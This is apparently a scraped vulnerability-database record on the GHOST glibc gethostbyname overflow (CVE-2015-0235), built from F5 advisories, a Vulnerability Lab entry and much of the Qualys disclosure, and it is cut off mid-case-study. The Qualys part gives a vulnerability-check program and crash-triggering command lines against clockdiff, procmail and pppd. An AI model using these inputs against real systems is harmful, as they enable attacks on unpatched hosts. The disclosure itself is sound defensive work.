For additional information, refer to [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\nFor information about using the BIG-IP ASM system and iRules to mitigate various GHOST exploits, refer to the [GHOST Vulnerability (CVE-2015-0235)](<https://devcentral.f5.com/articles/ghost-vulnerability-cve-2015-0235>) DevCentral article.\n\n**Note:** A DevCentral login is required to access this content.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K7312: Overview of the management port](<https://support.f5.com/csp/article/K7312>)\n", "modified": "2018-01-11T19:08:00", "published": "2015-01-28T03:29:00", "id": "F5:K16057", "href": "https://support.f5.com/csp/article/K16057", "title": "GHOST: glibc gethostbyname buffer overflow vulnerability CVE-2015-0235", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-30T01:27:33", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. 
If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists. F5 is working to provide a patch for this issue, and will update this article as soon as a patch becomes available.\n\nTo mitigate this vulnerability, you should only permit access to F5 products over a secure network and limit login access to trusted users. For additional information, refer to SOL13092: Overview of securing access to the BIG-IP system.\n\nFor information about using the BIG-IP ASM system and iRules to mitigate various GHOST exploits, refer to the [GHOST Vulnerability (CVE-2015-0235)](<https://devcentral.f5.com/articles/ghost-vulnerability-cve-2015-0235>) DevCentral article. \n \n**Note:** A DevCentral login is required to access this content.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL7312: Overview of the management port\n", "modified": "2016-08-17T00:00:00", "published": "2015-01-27T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/000/sol16057.html", "id": "SOL16057", "title": "SOL16057 - GHOST: glibc gethostbyname buffer overflow vulnerability CVE-2015-0235", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "vulnerlab": [{"lastseen": "2018-08-31T00:11:44", "bulletinFamily": "exploit", "description": "", "modified": "2015-01-30T00:00:00", "published": "2015-01-30T00:00:00", "id": "VULNERLAB:1430", "href": "http://www.vulnerability-lab.com/get_content.php?id=1430", "title": "Glibc Ghost Vulnerability (CVE-2015-0235) - How to Secure", "type": "vulnerlab", 
"sourceData": "Document Title:\r\n===============\r\nGlibc Ghost Vulnerability (CVE-2015-0235) - How to Secure\r\n\r\n\r\nReferences:\r\n===========\r\nhttp://www.vulnerability-lab.com/get_content.php?id=1430\r\n\r\nDownload: http://www.vulnerability-lab.com/resources/documents/1430.pdf\r\n\r\n\r\n\r\nRelease Date:\r\n=============\r\n2015-01-30\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1430\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nReport\r\n\r\n\r\nSeverity Level:\r\n===============\r\nHigh\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nThe GNU C Library or glibc is an implementation of the standard C library and a core part of the Linux operating system. Without this library a \r\nLinux system will not function. The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control \r\nof the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue.\r\n\r\nThe paper explains the vulnerability in the linux system and demonstrates how to prevent a local or remote compromise.\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nRajivarnan R. [Security Researcher] - Akati Consulting Pvt Ltd \r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed \r\nor implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable \r\nin any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab \r\nor its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for \r\nconsequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \r\npolicies, deface websites, hack into databases or trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t \t\t- www.evolution-sec.com\r\nContact: admin@vulnerability-lab.com \t- research@vulnerability-lab.com \t \t\t- admin@evolution-sec.com\r\nSection: magazine.vulnerability-db.com\t- vulnerability-lab.com/contact.php\t\t \t- evolution-sec.com/contact\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t \t\t- youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php \t\t- vulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php\t- vulnerability-lab.com/register/\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to \r\nelectronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website \r\nis trademark of vulnerability-lab team & the specific authors or managers. 
To record, list (feed), modify, use or edit our material contact \r\n(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.\r\n\r\n\t\t\t\tCopyright \u00a9 2015 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "description": "\r\n\r\n\r\nQualys Security Advisory CVE-2015-0235\r\n\r\nGHOST: glibc gethostbyname buffer overflow\r\n\r\n\r\n--[ Contents ]----------------------------------------------------------------\r\n\r\n1 - Summary\r\n2 - Analysis\r\n3 - Mitigating factors\r\n4 - Case studies\r\n5 - Exploitation\r\n6 - Acknowledgments\r\n\r\n\r\n--[ 1 - Summary ]-------------------------------------------------------------\r\n\r\nDuring a code audit performed internally at Qualys, we discovered a\r\nbuffer overflow in the __nss_hostname_digits_dots() function of the GNU\r\nC Library (glibc). This bug is reachable both locally and remotely via\r\nthe gethostbyname*() functions, so we decided to analyze it -- and its\r\nimpact -- thoroughly, and named this vulnerability "GHOST".\r\n\r\nOur main conclusions are:\r\n\r\n- Via gethostbyname() or gethostbyname2(), the overflowed buffer is\r\n located in the heap. Via gethostbyname_r() or gethostbyname2_r(), the\r\n overflowed buffer is caller-supplied (and may therefore be located in\r\n the heap, stack, .data, .bss, etc; however, we have seen no such call\r\n in practice).\r\n\r\n- At most sizeof(char *) bytes can be overwritten (ie, 4 bytes on 32-bit\r\n machines, and 8 bytes on 64-bit machines). 
Bytes can be overwritten\r\n only with digits ('0'...'9'), dots ('.'), and a terminating null\r\n character ('\0').\r\n\r\n- Despite these limitations, arbitrary code execution can be achieved.\r\n As a proof of concept, we developed a full-fledged remote exploit\r\n against the Exim mail server, bypassing all existing protections\r\n (ASLR, PIE, and NX) on both 32-bit and 64-bit machines. We will\r\n publish our exploit as a Metasploit module in the near future.\r\n\r\n- The first vulnerable version of the GNU C Library is glibc-2.2,\r\n released on November 10, 2000.\r\n\r\n- We identified a number of factors that mitigate the impact of this\r\n bug. In particular, we discovered that it was fixed on May 21, 2013\r\n (between the releases of glibc-2.17 and glibc-2.18). Unfortunately, it\r\n was not recognized as a security threat; as a result, most stable and\r\n long-term-support distributions were left exposed (and still are):\r\n Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7,\r\n Ubuntu 12.04, for example.\r\n\r\n\r\n--[ 2 - Analysis ]------------------------------------------------------------\r\n\r\nThe vulnerable function, __nss_hostname_digits_dots(), is called\r\ninternally by the glibc in nss/getXXbyYY.c (the non-reentrant version)\r\nand nss/getXXbyYY_r.c (the reentrant version). However, the calls are\r\nsurrounded by #ifdef HANDLE_DIGITS_DOTS, a macro defined only in:\r\n\r\n- inet/gethstbynm.c\r\n- inet/gethstbynm2.c\r\n- inet/gethstbynm_r.c\r\n- inet/gethstbynm2_r.c\r\n- nscd/gethstbynm3_r.c\r\n\r\nThese files implement the gethostbyname*() family, and hence the only\r\nway to reach __nss_hostname_digits_dots() and its buffer overflow. 
The\r\npurpose of this function is to avoid expensive DNS lookups if the\r\nhostname argument is already an IPv4 or IPv6 address.\r\n\r\nThe code below comes from glibc-2.17:\r\n\r\n 35 int\r\n 36 __nss_hostname_digits_dots (const char *name, struct hostent *resbuf,\r\n 37 char **buffer, size_t *buffer_size,\r\n 38 size_t buflen, struct hostent **result,\r\n 39 enum nss_status *status, int af, int *h_errnop)\r\n 40 {\r\n ..\r\n 57 if (isdigit (name[0]) || isxdigit (name[0]) || name[0] == ':')\r\n 58 {\r\n 59 const char *cp;\r\n 60 char *hostname;\r\n 61 typedef unsigned char host_addr_t[16];\r\n 62 host_addr_t *host_addr;\r\n 63 typedef char *host_addr_list_t[2];\r\n 64 host_addr_list_t *h_addr_ptrs;\r\n 65 char **h_alias_ptr;\r\n 66 size_t size_needed;\r\n ..\r\n 85 size_needed = (sizeof (*host_addr)\r\n 86 + sizeof (*h_addr_ptrs) + strlen (name) + 1);\r\n 87\r\n 88 if (buffer_size == NULL)\r\n 89 {\r\n 90 if (buflen < size_needed)\r\n 91 {\r\n ..\r\n 95 goto done;\r\n 96 }\r\n 97 }\r\n 98 else if (buffer_size != NULL && *buffer_size < size_needed)\r\n 99 {\r\n100 char *new_buf;\r\n101 *buffer_size = size_needed;\r\n102 new_buf = (char *) realloc (*buffer, *buffer_size);\r\n103\r\n104 if (new_buf == NULL)\r\n105 {\r\n...\r\n114 goto done;\r\n115 }\r\n116 *buffer = new_buf;\r\n117 }\r\n...\r\n121 host_addr = (host_addr_t *) *buffer;\r\n122 h_addr_ptrs = (host_addr_list_t *)\r\n123 ((char *) host_addr + sizeof (*host_addr));\r\n124 h_alias_ptr = (char **) ((char *) h_addr_ptrs + sizeof (*h_addr_ptrs));\r\n125 hostname = (char *) h_alias_ptr + sizeof (*h_alias_ptr);\r\n126\r\n127 if (isdigit (name[0]))\r\n128 {\r\n129 for (cp = name;; ++cp)\r\n130 {\r\n131 if (*cp == '\0')\r\n132 {\r\n133 int ok;\r\n134\r\n135 if (*--cp == '.')\r\n136 break;\r\n...\r\n142 if (af == AF_INET)\r\n143 ok = __inet_aton (name, (struct in_addr *) host_addr);\r\n144 else\r\n145 {\r\n146 assert (af == AF_INET6);\r\n147 ok = inet_pton (af, name, host_addr) > 0;\r\n148 }\r\n149 if (! 
ok)\r\n150 {\r\n...\r\n154 goto done;\r\n155 }\r\n156\r\n157 resbuf->h_name = strcpy (hostname, name);\r\n...\r\n194 goto done;\r\n195 }\r\n196\r\n197 if (!isdigit (*cp) && *cp != '.')\r\n198 break;\r\n199 }\r\n200 }\r\n...\r\n\r\nLines 85-86 compute the size_needed to store three (3) distinct entities\r\nin buffer: host_addr, h_addr_ptrs, and name (the hostname). Lines 88-117\r\nmake sure the buffer is large enough: lines 88-97 correspond to the\r\nreentrant case, lines 98-117 to the non-reentrant case.\r\n\r\nLines 121-125 prepare pointers to store four (4) distinct entities in\r\nbuffer: host_addr, h_addr_ptrs, h_alias_ptr, and hostname. The sizeof\r\n(*h_alias_ptr) -- the size of a char pointer -- is missing from the\r\ncomputation of size_needed.\r\n\r\nThe strcpy() on line 157 should therefore allow us to write past the end\r\nof buffer, at most (depending on strlen(name) and alignment) 4 bytes on\r\n32-bit machines, or 8 bytes on 64-bit machines. There is a similar\r\nstrcpy() after line 200, but no buffer overflow:\r\n\r\n236 size_needed = (sizeof (*host_addr)\r\n237 + sizeof (*h_addr_ptrs) + strlen (name) + 1);\r\n...\r\n267 host_addr = (host_addr_t *) *buffer;\r\n268 h_addr_ptrs = (host_addr_list_t *)\r\n269 ((char *) host_addr + sizeof (*host_addr));\r\n270 hostname = (char *) h_addr_ptrs + sizeof (*h_addr_ptrs);\r\n...\r\n289 resbuf->h_name = strcpy (hostname, name);\r\n\r\nIn order to reach the overflow at line 157, the hostname argument must\r\nmeet the following requirements:\r\n\r\n- Its first character must be a digit (line 127).\r\n\r\n- Its last character must not be a dot (line 135).\r\n\r\n- It must comprise only digits and dots (line 197) (we call this the\r\n "digits-and-dots" requirement).\r\n\r\n- It must be long enough to overflow the buffer. 
For example, the\r\n non-reentrant gethostbyname*() functions initially allocate their\r\n buffer with a call to malloc(1024) (the "1-KB" requirement).\r\n\r\n- It must be successfully parsed as an IPv4 address by inet_aton() (line\r\n 143), or as an IPv6 address by inet_pton() (line 147). Upon careful\r\n analysis of these two functions, we can further refine this\r\n "inet-aton" requirement:\r\n\r\n . It is impossible to successfully parse a "digits-and-dots" hostname\r\n as an IPv6 address with inet_pton() (':' is forbidden). Hence it is\r\n impossible to reach the overflow with calls to gethostbyname2() or\r\n gethostbyname2_r() if the address family argument is AF_INET6.\r\n\r\n . Conclusion: inet_aton() is the only option, and the hostname must\r\n have one of the following forms: "a.b.c.d", "a.b.c", "a.b", or "a",\r\n where a, b, c, d must be unsigned integers, at most 0xfffffffful,\r\n converted successfully (ie, no integer overflow) by strtoul() in\r\n decimal or octal (but not hexadecimal, because 'x' and 'X' are\r\n forbidden).\r\n\r\n\r\n--[ 3 - Mitigating factors ]--------------------------------------------------\r\n\r\nThe impact of this bug is reduced significantly by the following\r\nreasons:\r\n\r\n- A patch already exists (since May 21, 2013), and has been applied and\r\n tested since glibc-2.18, released on August 12, 2013:\r\n\r\n [BZ #15014]\r\n * nss/getXXbyYY_r.c (INTERNAL (REENTRANT_NAME))\r\n [HANDLE_DIGITS_DOTS]: Set any_service when digits-dots parsing was\r\n successful.\r\n * nss/digits_dots.c (__nss_hostname_digits_dots): Remove\r\n redundant variable declarations and reallocation of buffer when\r\n parsing as IPv6 address. Always set NSS status when called from\r\n reentrant functions. Use NETDB_INTERNAL instead of TRY_AGAIN when\r\n buffer too small. 
Correct computation of needed size.\r\n * nss/Makefile (tests): Add test-digits-dots.\r\n * nss/test-digits-dots.c: New test.\r\n\r\n- The gethostbyname*() functions are obsolete; with the advent of IPv6,\r\n recent applications use getaddrinfo() instead.\r\n\r\n- Many programs, especially SUID binaries reachable locally, use\r\n gethostbyname() if, and only if, a preliminary call to inet_aton()\r\n fails. However, a subsequent call must also succeed (the "inet-aton"\r\n requirement) in order to reach the overflow: this is impossible, and\r\n such programs are therefore safe.\r\n\r\n- Most of the other programs, especially servers reachable remotely, use\r\n gethostbyname() to perform forward-confirmed reverse DNS (FCrDNS, also\r\n known as full-circle reverse DNS) checks. These programs are generally\r\n safe, because the hostname passed to gethostbyname() has normally been\r\n pre-validated by DNS software:\r\n\r\n . "a string of labels each containing up to 63 8-bit octets, separated\r\n by dots, and with a maximum total of 255 octets." This makes it\r\n impossible to satisfy the "1-KB" requirement.\r\n\r\n . Actually, glibc's DNS resolver can produce hostnames of up to\r\n (almost) 1025 characters (in case of bit-string labels, and special\r\n or non-printable characters). 
But this introduces backslashes ('\\')\r\n and makes it impossible to satisfy the "digits-and-dots"\r\n requirement.\r\n\r\n\r\n--[ 4 - Case studies ]--------------------------------------------------------\r\n\r\nIn this section, we will analyze real-world examples of programs that\r\ncall the gethostbyname*() functions, but we first introduce a small test\r\nprogram that checks whether a system is vulnerable or not:\r\n\r\n[user@fedora-19 ~]$ cat > GHOST.c << EOF\r\n#include <netdb.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n#define CANARY "in_the_coal_mine"\r\n\r\nstruct {\r\n char buffer[1024];\r\n char canary[sizeof(CANARY)];\r\n} temp = { "buffer", CANARY };\r\n\r\nint main(void) {\r\n struct hostent resbuf;\r\n struct hostent *result;\r\n int herrno;\r\n int retval;\r\n\r\n /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/\r\n size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;\r\n char name[sizeof(temp.buffer)];\r\n memset(name, '0', len);\r\n name[len] = '\0';\r\n\r\n retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);\r\n\r\n if (strcmp(temp.canary, CANARY) != 0) {\r\n puts("vulnerable");\r\n exit(EXIT_SUCCESS);\r\n }\r\n if (retval == ERANGE) {\r\n puts("not vulnerable");\r\n exit(EXIT_SUCCESS);\r\n }\r\n puts("should not happen");\r\n exit(EXIT_FAILURE);\r\n}\r\nEOF\r\n\r\n[user@fedora-19 ~]$ gcc GHOST.c -o GHOST\r\n\r\nOn Fedora 19 (glibc-2.17):\r\n\r\n[user@fedora-19 ~]$ ./GHOST\r\nvulnerable\r\n\r\nOn Fedora 20 (glibc-2.18):\r\n\r\n[user@fedora-20 ~]$ ./GHOST\r\nnot vulnerable\r\n\r\n----[ 4.1 - The GNU C Library ]-----------------------------------------------\r\n\r\nThe glibc itself contains a few calls to gethostbyname*() functions. 
In\r\nparticular, getaddrinfo() calls gethostbyname2_r() if, but only if, a\r\nfirst call to inet_aton() fails: in accordance with the "inet-aton"\r\nrequirement, these internal calls are safe. For example,\r\neglibc-2.13/sysdeps/posix/getaddrinfo.c:\r\n\r\n at->family = AF_UNSPEC;\r\n ...\r\n if (__inet_aton (name, (struct in_addr *) at->addr) != 0)\r\n {\r\n if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET)\r\n at->family = AF_INET;\r\n else if (req->ai_family == AF_INET6 && (req->ai_flags & AI_V4MAPPED))\r\n {\r\n ...\r\n at->family = AF_INET6;\r\n }\r\n else\r\n return -EAI_ADDRFAMILY;\r\n ...\r\n }\r\n ...\r\n if (at->family == AF_UNSPEC && (req->ai_flags & AI_NUMERICHOST) == 0)\r\n {\r\n ...\r\n size_t tmpbuflen = 512;\r\n char *tmpbuf = alloca (tmpbuflen);\r\n ...\r\n rc = __gethostbyname2_r (name, family, &th, tmpbuf,\r\n tmpbuflen, &h, &herrno);\r\n ...\r\n }\r\n\r\n----[ 4.2 - mount.nfs ]-------------------------------------------------------\r\n\r\nSimilarly, mount.nfs (a SUID-root binary) is not vulnerable:\r\n\r\n if (inet_aton(hostname, &addr->sin_addr))\r\n return 0;\r\n if ((hp = gethostbyname(hostname)) == NULL) {\r\n nfs_error(_("%s: can't get address for %s\n"),\r\n progname, hostname);\r\n return -1;\r\n }\r\n\r\n----[ 4.3 - mtr ]-------------------------------------------------------------\r\n\r\nmtr (another SUID-root binary) is not vulnerable either, because it\r\ncalls getaddrinfo() instead of gethostbyname*() functions on any modern\r\n(ie, IPv6-enabled) system:\r\n\r\n#ifdef ENABLE_IPV6\r\n /* gethostbyname2() is deprecated so we'll use getaddrinfo() instead. 
*/\r\n ...\r\n error = getaddrinfo( Hostname, NULL, &hints, &res );\r\n if ( error ) {\r\n if (error == EAI_SYSTEM)\r\n perror ("Failed to resolve host");\r\n else\r\n fprintf (stderr, "Failed to resolve host: %s\n", gai_strerror(error));\r\n exit( EXIT_FAILURE );\r\n }\r\n ...\r\n#else\r\n host = gethostbyname(Hostname);\r\n if (host == NULL) {\r\n herror("mtr gethostbyname");\r\n exit(1);\r\n }\r\n ...\r\n#endif\r\n\r\n----[ 4.4 - iputils ]---------------------------------------------------------\r\n\r\n------[ 4.4.1 - clockdiff ]---------------------------------------------------\r\n\r\nclockdiff is vulnerable in a straightforward manner:\r\n\r\n hp = gethostbyname(argv[1]);\r\n if (hp == NULL) {\r\n fprintf(stderr, "clockdiff: %s: host not found\n", argv[1]);\r\n exit(1);\r\n }\r\n\r\n[user@fedora-19-32b ~]$ ls -l /usr/sbin/clockdiff\r\n-rwxr-xr-x. 1 root root 15076 Feb 1 2013 /usr/sbin/clockdiff\r\n\r\n[user@fedora-19-32b ~]$ getcap /usr/sbin/clockdiff\r\n/usr/sbin/clockdiff = cap_net_raw+ep\r\n\r\n[user@fedora-19-32b ~]$ /usr/sbin/clockdiff `python -c "print '0' * $((0x10000-16*1-2*4-1-4))"`\r\n.Segmentation fault\r\n\r\n[user@fedora-19-32b ~]$ /usr/sbin/clockdiff `python -c "print '0' * $((0x20000-16*1-2*4-1-4))"`\r\nSegmentation fault\r\n\r\n[user@fedora-19-32b ~]$ dmesg\r\n...\r\n[202071.118929] clockdiff[3610]: segfault at b86711f4 ip b75de0c6 sp bfc191f0 error 6 in libc-2.17.so[b7567000+1b8000]\r\n[202086.144336] clockdiff[3618]: segfault at b90d0d24 ip b75bb0c6 sp bf8e9dc0 error 6 in libc-2.17.so[b7544000+1b8000]\r\n\r\n------[ 4.4.2 - ping and arping ]---------------------------------------------\r\n\r\nping and arping call gethostbyname() and gethostbyname2(), respectively,\r\nif and only if inet_aton() fails first. 
This time, however, there is\r\nanother function call in between (Fedora, for example, does define\r\nUSE_IDN):\r\n\r\n--------[ 4.4.2.1 - ping ]----------------------------------------------------\r\n\r\n if (inet_aton(target, &whereto.sin_addr) == 1) {\r\n ...\r\n } else {\r\n char *idn;\r\n#ifdef USE_IDN\r\n int rc;\r\n ...\r\n rc = idna_to_ascii_lz(target, &idn, 0);\r\n if (rc != IDNA_SUCCESS) {\r\n fprintf(stderr, "ping: IDN encoding failed: %s\n", idna_strerror(rc));\r\n exit(2);\r\n }\r\n#else\r\n idn = target;\r\n#endif\r\n hp = gethostbyname(idn);\r\n\r\n--------[ 4.4.2.2 - arping ]--------------------------------------------------\r\n\r\n if (inet_aton(target, &dst) != 1) {\r\n struct hostent *hp;\r\n char *idn = target;\r\n#ifdef USE_IDN\r\n int rc;\r\n\r\n rc = idna_to_ascii_lz(target, &idn, 0);\r\n\r\n if (rc != IDNA_SUCCESS) {\r\n fprintf(stderr, "arping: IDN encoding failed: %s\n", idna_strerror(rc));\r\n exit(2);\r\n }\r\n#endif\r\n\r\n hp = gethostbyname2(idn, AF_INET);\r\n\r\n--------[ 4.4.2.3 - Analysis ]------------------------------------------------\r\n\r\nIf idna_to_ascii_lz() modifies the target hostname, the first call to\r\ninet_aton() could fail and the second call (internal to gethostbyname())\r\ncould succeed. For example, idna_to_ascii_lz() transforms any Unicode\r\ndot-like character (0x3002, 0xFF0E, 0xFF61) into an ASCII dot (".").\r\n\r\nBut it also restricts the length of a domain label to 63 characters:\r\nthis makes it impossible to reach 1024 bytes (the "1-KB" requirement)\r\nwith only 4 labels and 3 dots (the "inet-aton" requirement).\r\n\r\nUnless inet_aton() (actually, strtoul()) can be tricked into accepting\r\nmore than 3 dots? Indeed, idna_to_ascii_lz() does not restrict the total\r\nlength of a domain name. 
glibc supports "thousands' grouping characters"\r\n(man 3 printf); for example, sscanf(str, "%'lu", &ul) yields 1000 when\r\nprocessing any of the following input strings:\r\n\r\n- "1,000" in an English locale;\r\n- "1 000" in a French locale; and\r\n- "1.000" in a German or Spanish locale.\r\n\r\nstrtoul() implements this "number grouping" too, but its use is limited\r\nto internal glibc functions. Conclusion: more than 3 dots is impossible,\r\nand neither ping nor arping is vulnerable.\r\n\r\n----[ 4.5 - procmail ]--------------------------------------------------------\r\n\r\nprocmail (a SUID-root and SGID-mail binary) is vulnerable through its\r\n"comsat/biff" feature:\r\n\r\n#define COMSAThost "localhost" /* where the biff/comsat daemon lives */\r\n...\r\n#define SERV_ADDRsep '@' /* when overriding in COMSAT=serv@addr */\r\n\r\nint setcomsat(chp)const char*chp;\r\n{ char*chad; ...\r\n chad=strchr(chp,SERV_ADDRsep); /* @ separator? */\r\n ...\r\n if(chad)\r\n *chad++='\0'; /* split the specifier */\r\n if(!chad||!*chad) /* no host */\r\n#ifndef IP_localhost /* Is "localhost" preresolved? 
*/\r\n chad=COMSAThost; /* nope, use default */\r\n#else /* IP_localhost */\r\n { ...\r\n }\r\n else\r\n#endif /* IP_localhost */\r\n { ...\r\n if(!(host=gethostbyname(chad))||!host->h_0addr_list)\r\n\r\nuser@debian-7-2-32b:~$ ls -l /usr/bin/procmail\r\n-rwsr-sr-x 1 root mail 83912 Jun 6 2012 /usr/bin/procmail\r\n\r\nuser@debian-7-2-32b:~$ /usr/bin/procmail 'VERBOSE=on' 'COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null\r\n...\r\n*** glibc detected *** /usr/bin/procmail: free(): invalid next size (normal): 0x0980de30 ***\r\n======= Backtrace: =========\r\n/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x70f01)[0xb76b2f01]\r\n/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x72768)[0xb76b4768]\r\n/lib/i386-linux-gnu/i686/cmov/libc.so.6(cfree+0x6d)[0xb76b781d]\r\n/usr/bin/procmail[0x80548ec]\r\n/lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7658e46]\r\n/usr/bin/procmail[0x804bb55]\r\n======= Memory map: ========\r\n...\r\n0980a000-0982b000 rw-p 00000000 00:00 0 [heap]\r\n...\r\nAborted\r\n\r\nuser@debian-7-2-32b:~$ _COMSAT_='COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"`\r\n\r\nuser@debian-7-2-32b:~$ /usr/bin/procmail "$_COMSAT_" "$_COMSAT_"1234 < /dev/null\r\nSegmentation fault\r\n\r\nuser@debian-7-2-32b:~$ /usr/bin/procmail "$_COMSAT_"12345670 "$_COMSAT_"123456701234 < /dev/null\r\nSegmentation fault\r\n\r\nuser@debian-7-2-32b:~$ dmesg\r\n...\r\n[211409.564917] procmail[4549]: segfault at c ip b768e5a4 sp bfcb53d8 error 4 in libc-2.13.so[b761c000+15c000]\r\n[211495.820710] procmail[4559]: segfault at b8cb290c ip b763c5a4 sp bf870c98 error 4 in libc-2.13.so[b75ca000+15c000]\r\n\r\n----[ 4.6 - pppd ]------------------------------------------------------------\r\n\r\npppd (yet another SUID-root binary) calls gethostbyname() if a\r\npreliminary call to inet_addr() (a simple wrapper around inet_aton())\r\nfails. 
"The inet_addr() function converts the Internet host address cp\r\nfrom IPv4 numbers-and-dots notation into binary data in network byte\r\norder. If the input is invalid, INADDR_NONE (usually -1) is returned.\r\nUse of this function is problematic because -1 is a valid address\r\n(255.255.255.255)." A failure for inet_addr(), but a success for\r\ninet_aton(), and consequently a path to the buffer overflow.\r\n\r\nuser@ubuntu-12-04-32b:~$ ls -l /usr/sbin/pppd\r\n-rwsr-xr-- 1 root dip 273272 Feb 3 2011 /usr/sbin/pppd\r\n\r\nuser@ubuntu-12-04-32b:~$ id\r\nuid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)\r\n\r\n------[ 4.6.1 - ms-dns option ]-----------------------------------------------\r\n\r\nstatic int\r\nsetdnsaddr(argv)\r\n char **argv;\r\n{\r\n u_int32_t dns;\r\n struct hostent *hp;\r\n\r\n dns = inet_addr(*argv);\r\n if (dns == (u_int32_t) -1) {\r\n if ((hp = gethostbyname(*argv)) == NULL) {\r\n option_error("invalid address parameter '%s' for ms-dns option",\r\n *argv);\r\n return 0;\r\n }\r\n dns = *(u_int32_t *)hp->h_addr;\r\n }\r\n\r\nuser@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'dryrun' 'ms-dns' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255'\r\n*** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x09c0f928 ***\r\n======= Backtrace: =========\r\n/lib/i386-linux-gnu/libc.so.6(+0x75ee2)[0xb75e1ee2]\r\n/lib/i386-linux-gnu/libc.so.6(+0x65db5)[0xb75d1db5]\r\n/lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb75d1deb]\r\n/usr/sbin/pppd(options_from_file+0xa8)[0x8064948]\r\n/usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e]\r\n/usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4]\r\n/usr/sbin/pppd(main+0x1cf)[0x8050b2f]\r\n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb75854d3]\r\n======= Memory map: ========\r\n...\r\n09c0c000-09c2d000 rw-p 00000000 00:00 0 [heap]\r\n...\r\nAborted (core dumped)\r\n\r\n------[ 4.6.2 - ms-wins option 
